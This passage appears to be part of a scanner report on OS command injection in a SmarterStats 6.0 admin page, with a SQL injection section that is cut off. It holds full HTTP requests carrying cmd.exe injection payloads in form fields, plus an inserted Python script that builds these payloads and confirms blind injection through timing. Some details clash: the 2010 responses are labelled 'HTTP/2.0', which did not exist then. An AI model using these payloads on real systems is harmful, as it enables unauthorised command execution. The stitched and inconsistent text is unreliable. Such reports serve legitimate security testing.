The payload %26ping%20-n%2020%20127.0.0.1%26 was submitted in the ctl00%24MPH%24ucSiteSeoSettings%24txtSeoMaxKeywords_SettingText parameter, turning the value 5 into 5&ping -n 20 127.0.0.1&. The application timed out when responding to the request, with only the interim HTTP 100 Continue recorded, indicating that the injected command caused a time delay. The delay also shows that the field is not rejected as non-numeric before its value is used.

Request

POST /Admin/frmSite.aspx?SiteId=1&popup=true HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Proxy-Connection: keep-alive
Referer: http://vulnerable.smarterstats.6.0.host:9999/Admin/frmSite.aspx?SiteId=1&popup=true
Origin: http://vulnerable.smarterstats.6.0.host:9999
X-Requested-With: XMLHttpRequest
X-MicrosoftAjax: Delta=true
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Cache-Control: no-cache
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; STHashCookie={"CountsGuid":"1413386179","TopBarSection":"AdminManage"}; SelectedLanguage=; STTTState=
Content-Length: 30100

ctl00%24ScriptManager1=ctl00%24MPH%24UpdatePanel5%7Cctl00%24MPH%24ddlChangeSiteAdmin_SettingDropDown&__EVENTTARGET=ctl00%24MPH%24ddlChangeSiteAdmin_SettingDropDown&__EVENTARGUMENT=&__LASTFOCUS=&__VIEWSTATE=%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%2F%2F%2F%2F%2FwEAAAAAAAAABAEAAADiAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLkRpY3Rpb25hcnlgMltbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLk9iamVjdCwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0EAAAAB1ZlcnNpb24IQ29tcGFyZXIISGFzaFNpemUNS2V5VmFsdWVQYWlycwADAAMIkgFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5HZW5lcmljRXF1YWxpdHlDb21wYXJlcmAxW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQjmAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLktleVZhbHVlUGFpcmAyW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uT2JqZWN0LCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXVtdBQAAAAkCAAAABwAAAAkDAAAABAIAAACSAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLkdlbmVyaWNFcXVhbGl0eUNvbXBhcmVyYDFbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dAAAAAAcDAAAAAAEAAAAFAAAAA%2BQBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuS2V5VmFsdWVQYWlyYDJbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dBPz%2F%2F%2F%2FkAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLktleVZhbHVlUGFpcmAyW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uT2JqZWN0LCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5l
dXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQIAAAADa2V5BXZhbHVlAQIGBQAAAAdFbmFibGVkCAEBAfr%2F%2F%2F%2F8%2F%2F%2F%2FBgcAAAAEVGV4dAoB%2BP%2F%2F%2F%2Fz%2F%2F%2F8GCQAAAApSZXNvdXJjZUlEBgoAAAAKQExvZ1N0YXR1cwH1%2F%2F%2F%2F%2FP%2F%2F%2FwYMAAAACFNlbGVjdGVkCAEAAfP%2F%2F%2F%2F8%2F%2F%2F%2FBg4AAAAKUGFnZVZpZXdJRAYPAAAADExvZ1N0YXR1c1RhYgtkBSZjdGwwMCRUUEgkSHlwZXJUYWJTdHJpcDEkSHlwZXJUYWJJdGVtNA8y1AsAAQAAAP%2F%2F%2F%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%2F%2F%2F%2F5AFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5LZXlWYWx1ZVBhaXJgMltbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLk9iamVjdCwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0CAAAAA2tleQV2YWx1ZQECBgUAAAAHRW5hYmxlZAgBAQH6%2F%2F%2F%2F%2FP%2F%2F%2FwYHAAAABFRleHQKAfj%2F%2F%2F%2F8%2F%2F%2F%2FBgkAAAAKUmVzb3VyY2VJRAYKAAAAB0BMb2dGVFAB9f%2F%2F%2F%2Fz%2F%2F%2F8GDAAAAAhTZWxlY3RlZAgBAAHz%2F%2F%2F%2F%2FP%2F%2F%2FwYOAAAAClBhZ2VWaWV3SUQGDwAAAAlMb2dGVFBUYWILZAUWY3RsMDAkTVBIJGdyZExvZ1N0YXR1cw8FNVRydWV8VHJ1ZXx8VHJ1ZXxUcnVlfExhc3RUaW1lU3RhbXAgZGVzY3xGYWxzZXxGYWxzZXwwZAUmY3RsMDAkVFBIJEh5cGVyVGFiU3RyaXAxJEh5cGVyVGFiSXRlbTIPMtwLAAEAAAD%2F%2F%2F%2F%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%2FP%2F%2F%2F%2BQBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuS2V5VmFsdWVQYWlyYDJbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dAgAAAANrZXkFdmFsdWUBAgYFAAAAB0VuYWJsZWQIAQEB%2Bv%2F%2F%2F%2Fz%2F%2F%2F8GBwAAAARUZXh0CgH4%2F%2F%2F%2F%2FP%2F%2F%2FwYJAAAAClJlc291cmNlSUQGCgAAAAtATG9nT3B0aW9ucwH1%2F%2F%2F%2F%2FP%2F%2F%2FwYMAAAACFNlbGVjdGVkCAEAAfP%2F%2F%2F%2F8%2F%2F%2F%2FBg4AAAAKUGFnZVZpZXdJRAYPAAAADUxvZ09wdGlvbnNUYWILZAUZY3RsMDAkTVBIJGdyZExvZ0xvY2F0aW9ucw8FJFRydWV8VHJ1ZXx8RmFsc2V8VHJ1ZXx8RmFsc2V8RmFsc2V8MGQFJmN0bD
AwJFRQSCRIeXBlclRhYlN0cmlwMSRIeXBlclRhYkl0ZW0zDzLgCwABAAAA%2F%2F%2F%2F%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%2BQBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuS2V5VmFsdWVQYWlyYDJbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dBPz%2F%2F%2F%2FkAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLktleVZhbHVlUGFpcmAyW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uT2JqZWN0LCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQIAAAADa2V5BXZhbHVlAQIGBQAAAAdFbmFibGVkCAEBAfr%2F%2F%2F%2F8%2F%2F%2F%2FBgcAAAAEVGV4dAoB%2BP%2F%2F%2F%2Fz%2F%2F%2F8GCQAAAApSZXNvdXJjZUlEBgoAAAANQExvZ0xvY2F0aW9ucwH1%2F%2F%2F%2F%2FP%2F%2F%2FwYMAAAACFNlbGVjdGVkCAEAAfP%2F%2F%2F%2F8%2F%2F%2F%2FBg4AAAAKUGFnZVZpZXdJRAYPAAAAD0xvZ0xvY2F0aW9uc1RhYgtkBSZjdGwwMCRUUEgkSHlwZXJUYWJTdHJpcDEkSHlwZXJUYWJJdGVtNQ8y3AsAAQAAAP%2F%2F%2F%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%2F%2F%2F%2F5AFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5LZXlWYWx1ZVBhaXJgMltbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLk9iamVjdCwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0CAAAAA2tleQV2YWx1ZQECBgUAAAAHRW5hYmxlZAgBAQH6%2F%2F%2F%2F%2FP%2F%2F%2FwYHAAAABFRleHQKAfj%2F%2F%2F%2F8%2F%2F%2F%2FBgkAAAAKUmVzb3VyY2VJRAYKAAAAC0BTZW9PcHRpb25zAfX%2F%2F%2F%2F8%2F%2F%2F%2FBgwAAAAIU2VsZWN0ZWQIAQAB8%2F%2F%2F%2F%2Fz%2F%2F%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%2F%2F%2F%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%2F%2F%2F%2F5AFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5LZXlWYWx1ZVBhaXJgMltbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaW
NLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLk9iamVjdCwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0CAAAAA2tleQV2YWx1ZQECBgUAAAAHRW5hYmxlZAgBAQH6%2F%2F%2F%2F%2FP%2F%2F%2FwYHAAAABFRleHQKAfj%2F%2F%2F%2F8%2F%2F%2F%2FBgkAAAAKUmVzb3VyY2VJRAYKAAAACEBPcHRpb25zAfX%2F%2F%2F%2F8%2F%2F%2F%2FBgwAAAAIU2VsZWN0ZWQIAQAB8%2F%2F%2F%2F%2Fz%2F%2F%2F8GDgAAAApQYWdlVmlld0lEBg8AAAAKT3B0aW9uc1RhYgtkBRZjdGwwMCRNUEgkZ3JkU2VvU3RhdHVzDwU6VHJ1ZXxUcnVlfHxUcnVlfFRydWV8bGFzdFByb2Nlc3NpbmdEYXRlIGRlc2N8RmFsc2V8RmFsc2V8MGQFJmN0bDAwJFRQSCRIeXBlclRhYlN0cmlwMSRIeXBlclRhYkl0ZW04DzLaCwABAAAA%2F%2F%2F%2F%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%2BQBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuS2V5VmFsdWVQYWlyYDJbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dBPz%2F%2F%2F%2FkAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLktleVZhbHVlUGFpcmAyW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uT2JqZWN0LCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQIAAAADa2V5BXZhbHVlAQIGBQAAAAdFbmFibGVkCAEBAfr%2F%2F%2F%2F8%2F%2F%2F%2FBgcAAAAEVGV4dAoB%2BP%2F%2F%2F%2Fz%2F%2F%2F8GCQAAAApSZXNvdXJjZUlEBgoAAAAKQFNFT1N0YXR1cwH1%2F%2F%2F%2F%2FP%2F%2F%2FwYMAAAACFNlbGVjdGVkCAEAAfP%2F%2F%2F%2F8%2F%2F%2F%2FBg4AAAAKUGFnZVZpZXdJRAYPAAAADFNFT1N0YXR1c1RhYgtkOM5P3EdqRgSfYoIjJCDTiv3sZp5ktoudiy8rNReMpN8%3D&ctl00%24TPH%24HyperTabStrip1%24SelectedTab=ctl00_TPH_HyperTabStrip1_HyperTabItem1&ctl00%24MPH%24VisiblePage=ctl00_MPH_OptionsTab&ctl00%24MPH%24txtDomainName_SettingText=hoyt.net&ctl00%24MPH%24txtDomainUrl_SettingText=&ctl00%24MPH%24lstServer_SettingDropDown=1&ctl00%24MPH%24lstStatus_SettingDropDown=start&ctl00%24MPH%24txtSmarterLogDirectory=C%3A%5CSmarte
rLogs&ctl00%24MPH%24ddlChangeSiteAdmin_SettingDropDown=&ctl00%24MPH%24chkSeoEnabled_SettingCheck=on&ctl00%24MPH%24lstLogLocation_SettingDropDown=Local&ctl00%24MPH%24lstLogFormat_SettingDropDown=W3Cex&ctl00%24MPH%24lstMonthsToKeepSmStats_SettingDropDown=0&ctl00%24MPH%24txtExportLogDirectory=&ctl00%24MPH%24txtLogFileExportLocURL_SettingText=&ctl00%24MPH%24txtDefaultDocuments_SettingText=index.htm%0Aindex.html%0Adefault.asp%0Adefault.aspx&ctl00_MPH_grdLogLocations_HiddenInput=ctl00_MPH_grdLogLocations_CB64_OTg3ZTY2NDQzZTUxNDk5MGE4YWZjZmI0NTZhMjMyYzA-&ctl00_MPH_grdLogLocations_HiddenLSR=0&ctl00%24MPH%24ucSiteSeoSettings%24txtSeoMaxKeywords_SettingText=5%26ping%20-n%2020%20127.0.0.1%26&ctl00%24MPH%24ucSiteSeoSettings%24txtSeoMaxCompetitors_SettingText=5&ctl00%24MPH%24ucSiteSeoSettings%24txtSeoMaxRanking_SettingText=100&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%240=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%248=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2415=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%241=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%249=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2416=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%242=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2410=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2417=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%243=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2411=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2418=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%244=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox
%2412=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2419=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%245=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2413=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2420=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%246=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2414=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2421=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%247=on&ctl00_MPH_grdLogStatus_HiddenInput=&ctl00_MPH_grdLogStatus_HiddenLSR=&ctl00_MPH_grdSeoStatus_HiddenInput=&ctl00_MPH_grdSeoStatus_HiddenLSR=&__ASYNCPOST=true&

Response

HTTP/2.0 100 Continue
Server: SmarterTools/2.0.3932.23369
Date: Tue, 12 Oct 2010 00:32:20 GMT
Content-Length: 0


1.6. http://vulnerable.smarterstats.6.0.host:9999/Admin/frmSite.aspx [ctl00_MPH_grdLogLocations_HiddenLSR parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Admin/frmSite.aspx

Issue detail

The ctl00_MPH_grdLogLocations_HiddenLSR parameter, a hidden grid-state field that normally carries an empty value or 0, appears to be vulnerable to OS command injection. It is possible to use the pipe character (|) to inject arbitrary OS commands: cmd.exe treats | as a command separator that feeds the preceding command's output into the next one, which runs regardless of how the first command fared. Command output is not returned in the application's responses, so the injection is blind; it was verified with a time-delay command.

The payload |ping%20-n%2020%20127.0.0.1||x (decoded: |ping -n 20 127.0.0.1||x) was submitted in the ctl00_MPH_grdLogLocations_HiddenLSR parameter. The trailing ||x runs x only if ping fails, so it harmlessly absorbs whatever text the application appends after the injection point. The application timed out when responding to the request, indicating that the injected command caused a time delay. Confidence is rated Firm rather than Certain, so confirm it with paired short and long delays before reporting.
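
Findings 1.4, 1.5 and 1.6 all rest on the same kind of evidence: a request that hangs for about as long as ping -n 20 takes. The script below is an added example and is not code from this report, from Burp or from SmarterTools. It builds the same form-encoded payloads the requests above carry (the field names are copied from them; the ~30 KB __VIEWSTATE is omitted) and confirms a candidate parameter by the difference between a short and a long delay rather than by a single timeout. The send callback, the clock parameter and fake_smarterstats are constructed so that the check runs offline; against a real host, send would POST the body and return once the final response, not the interim 100 Continue, has arrived.

```python
import re
import time
from urllib.parse import quote, unquote_plus

# Constructed subset of the frmSite.aspx form (the real postback also carries
# a ~30 KB __VIEWSTATE, which plays no part in the injection and is omitted).
SAMPLE_FIELDS = {
    "ctl00$MPH$txtDomainName_SettingText": "hoyt.net",
    "ctl00$MPH$ucSiteSeoSettings$txtSeoMaxKeywords_SettingText": "5",
    "ctl00$MPH$ucSiteSeoSearchEngineSettings$chklistEngines_SettingCheckBox$14": "on",
    "ctl00_MPH_grdLogLocations_HiddenLSR": "",
    "__ASYNCPOST": "true",
}


def delay_payload(seconds, separator="&"):
    """cmd.exe payload that sleeps about `seconds`: Windows ping waits one
    second between echo requests, so `-n N` takes roughly N-1 seconds."""
    return f"{separator}ping -n {seconds + 1} 127.0.0.1{separator}"


def build_body(fields, target, seconds, separator="&"):
    """Form-encode `fields` the way the browser did (quote with safe='' turns
    '$' into %24 and ' ' into %20) and append the delay payload to `target`."""
    if target not in fields:
        raise KeyError(target)
    parts = []
    for name, value in fields.items():
        if name == target:
            value += delay_payload(seconds, separator)
        parts.append(f"{quote(name, safe='')}={quote(value, safe='')}")
    return "&".join(parts)


def confirm_delay(send, fields, target, short=1, long=8, rounds=2,
                  slack=1.0, separator="&", clock=time.monotonic):
    """Differential check: True only if, in every round, the request carrying
    the long delay takes at least (long - short - slack) seconds more than the
    one carrying the short delay. A lone timeout is weak evidence on a page
    whose normal postback is already slow; a gap the tester chose is not."""
    for _ in range(rounds):
        t0 = clock()
        send(build_body(fields, target, short, separator))
        t_short = clock() - t0
        t0 = clock()
        send(build_body(fields, target, long, separator))
        t_long = clock() - t0
        if t_long - t_short < (long - short) - slack:
            return False
    return True


def fake_smarterstats(clock_state, vulnerable_param):
    """Constructed stand-in for the server: only `vulnerable_param` reaches
    cmd.exe. It advances a fake clock instead of sleeping, so the check runs
    instantly offline."""
    def send(body):
        clock_state[0] += 0.5  # fixed cost of a normal postback (assumed)
        for pair in body.split("&"):
            name, _, value = pair.partition("=")
            m = re.search(r"ping -n (\d+) 127\.0\.0\.1", unquote_plus(value))
            if m and unquote_plus(name) == vulnerable_param:
                clock_state[0] += int(m.group(1)) - 1
        return 200
    return send


if __name__ == "__main__":
    clock = [0.0]
    keywords = "ctl00$MPH$ucSiteSeoSettings$txtSeoMaxKeywords_SettingText"
    send = fake_smarterstats(clock, keywords)
    print(build_body(SAMPLE_FIELDS, keywords, 19))
    print("keywords injectable:",
          confirm_delay(send, SAMPLE_FIELDS, keywords, clock=lambda: clock[0]))
    print("domain name injectable:",
          confirm_delay(send, SAMPLE_FIELDS, "ctl00$MPH$txtDomainName_SettingText",
                        clock=lambda: clock[0]))
```

Use separator="|" to reproduce the shape of the 1.6 payload; the script then emits %7Cping%20-n%2021%20127.0.0.1%7C for a 20 second delay. Keep the short delay non-zero so both requests exercise the same code path, and keep slack below the gap between the two delays or the check can never pass.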

Request

POST /Admin/frmSite.aspx?SiteId=1&popup=true HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Proxy-Connection: keep-alive
Referer: http://vulnerable.smarterstats.6.0.host:9999/Admin/frmSite.aspx?SiteId=1&popup=true
Origin: http://vulnerable.smarterstats.6.0.host:9999
X-Requested-With: XMLHttpRequest
X-MicrosoftAjax: Delta=true
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Cache-Control: no-cache
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; STHashCookie={"CountsGuid":"1413386179","TopBarSection":"AdminManage"}; SelectedLanguage=; STTTState=
Content-Length: 30100

ctl00%24ScriptManager1=ctl00%24MPH%24UpdatePanel5%7Cctl00%24MPH%24ddlChangeSiteAdmin_SettingDropDown&__EVENTTARGET=ctl00%24MPH%24ddlChangeSiteAdmin_SettingDropDown&__EVENTARGUMENT=&__LASTFOCUS=&__VIEWSTATE=[__VIEWSTATE base64 blob omitted]&ctl00%24TPH%24HyperTabStrip1%24SelectedTab=ctl00_TPH_HyperTabStrip1_HyperTabItem1&ctl00%24MPH%24VisiblePage=ctl00_MPH_OptionsTab&ctl00%24MPH%24txtDomainName_SettingText=hoyt.net&ctl00%24MPH%24txtDomainUrl_SettingText=&ctl00%24MPH%24lstServer_SettingDropDown=1&ctl00%24MPH%24lstStatus_SettingDropDown=start&ctl00%24MPH%24txtSmarterLogDirectory=C%3A%5CSmarterLogs&ctl00%24MPH%24ddlChangeSiteAdmin_SettingDropDown=&ctl00%24MPH%24chkSeoEnabled_SettingCheck=on&ctl00%24MPH%24lstLogLocation_SettingDropDown=Local&ctl00%24MPH%24lstLogFormat_SettingDropDown=W3Cex&ctl00%24MPH%24lstMonthsToKeepSmStats_SettingDropDown=0&ctl00%24MPH%24txtExportLogDirectory=&ctl00%24MPH%24txtLogFileExportLocURL_SettingText=&ctl00%24MPH%24txtDefaultDocuments_SettingText=index.htm%0Aindex.html%0Adefault.asp%0Adefault.aspx&ctl00_MPH_grdLogLocations_HiddenInput=ctl00_MPH_grdLogLocations_CB64_OTg3ZTY2NDQzZTUxNDk5MGE4YWZjZmI0NTZhMjMyYzA-&ctl00_MPH_grdLogLocations_HiddenLSR=0|ping%20-n%2020%20127.0.0.1||x&ctl00%24MPH%24ucSiteSeoSettings%24txtSeoMaxKeywords_SettingText=5&ctl00%24MPH%24ucSiteSeoSettings%24txtSeoMaxCompetitors_SettingText=5&ctl00%24MPH%24ucSiteSeoSettings%24txtSeoMaxRanking_SettingText=100&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%240=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%248=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2415=on&ctl00%24MPH%24ucSite
SeoSearchEngineSettings%24chklistEngines_SettingCheckBox%241=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%249=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2416=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%242=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2410=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2417=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%243=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2411=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2418=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%244=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2412=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2419=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%245=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2413=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2420=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%246=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2414=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2421=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%247=on&ctl00_MPH_grdLogStatus_HiddenInput=&ctl00_MPH_grdLogStatus_HiddenLSR=&ctl00_MPH_grdSeoStatus_HiddenInput=&ctl00_MPH_grdSeoStatus_HiddenLSR=&__ASYNCPOST=true&

Response

HTTP/2.0 100 Continue
Server: SmarterTools/2.0.3932.23369
Date: Mon, 11 Oct 2010 23:53:39 GMT
Content-Length: 0


2. SQL injection
There are 23 instances of this issue:

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Issue remediation

